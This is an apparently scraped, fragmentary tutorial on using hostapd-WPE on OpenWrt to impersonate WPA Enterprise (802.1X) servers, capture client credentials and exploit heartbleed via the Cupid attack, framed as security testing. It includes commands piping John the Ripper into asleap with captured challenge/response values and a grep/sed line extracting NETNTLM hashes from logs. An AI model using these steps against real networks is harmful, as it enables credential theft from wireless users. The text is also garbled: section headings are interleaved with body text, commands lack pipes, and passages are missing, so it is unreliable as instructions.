
Attacks on WPA Enterprise infrastructures with hostapd-WPE
Date: (Last modified: 27 - Apr - 2020)
The previous article outlined the cross-compilation and installation process of hostapd-WPE for OpenWrt Barrier Breaker. This article continues detailing the configuration and execution of hostapd-WPE for OpenWrt, aiming in conducting security tests on WPA Enterprise environments 802.11x.
Hostapd-WPE allows conducting IEEE 802.11x (WPA Enterprise) server impersonation attacks in order to obtain client credentials, but also implements Cupid attack, allowing to exploit heartbleed vulnerability (CVE-2014-0160) on client connections over EAP-PEAP/TLS/TTLS.
After execution the private keys and certificates will be created. In order to use them with hostapd-WPE for OpenWrt it will be necessary to copy ca.pem, server.pem, server_no_pass.key and dh to the device folder /usr/local/etc/hostapd-wpe/certs
Alternatively the cracking can be done using asleap specifying the challange and response values. The following command uses John the Ripper to perform modification on dictionary words and redirecting the output to asleap. Note that the dash after the -W parameter allows John the Ripper output to be piped into asleap.
john –wordlist=/usr/share/john/password.lst –rules –stdout
asleap -C 5d:7c:53:ac:39:0d:44:c8 -R
0b:ee:1a:9e:0c:c4:98:aa:55:1c:69:92:62:e5:d5:82:60:0c:e8:81:01:81:23:91 -W –
The cracking can also be done with Aircrack or CowPatty.
- 802.11a (5Ghz) interface configuration
- Creating custom self signed SSL certificates (Optional)

- Hostapd-WPE execution
- Interface
- SSID
- Channels
- Certificates and private key.
- Log files
- Running hostapd-WPE for OpenWrt – 802.11b/g/n access point setup

- 802.11a/c access point setup
Recovering client credentials by cracking WPA Enterprise hashes
In first place the client hashes will need to be recovered from the log files. The hashes will be saved in the hashes_john.txt file. cat wpe_bgn.log grep “jtr NETNTLM”sed ‘s/ [ ]*jtr NETNTLM:[ ]*//’ > hashes_john.txt
References:
Leave a comment